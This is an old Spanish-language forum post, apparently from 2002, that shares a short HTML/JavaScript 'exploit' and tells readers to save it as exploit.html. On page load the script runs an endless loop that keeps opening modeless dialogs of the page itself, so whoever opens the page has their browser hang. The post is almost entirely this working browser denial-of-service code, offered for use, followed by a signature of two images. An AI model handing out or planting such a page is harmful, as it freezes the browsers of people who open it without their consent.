
11/01/2002, 18:41
|
| | Fecha de Ingreso: diciembre-2001
Mensajes: 47
Antigüedad: 23 años, 4 meses Puntos: 0 | |
Exploid en JavaScript Al usar este kodigo, la pagina se karga indefinidamente.
Copia este kodigo y guardalo kon el nombre de exploit.html
<html>
<head>
<script language="javascript">
function exploit() {
kolgada=1
while(kolgada=1) {
showModelessDialog("exploit.html");
}
}
</script>
</head>
<body onLoad="exploit()">
</body>
</html
<html><body>
<p><img border="0" src="http://www.suarsystem.com/xombra/logofirmasawven.jpg" width="50" height="58"><img border="0" src="http://www.suarsystem.com/xombra/xombra210.gif" width="166" height="89"></p>
</body></html> |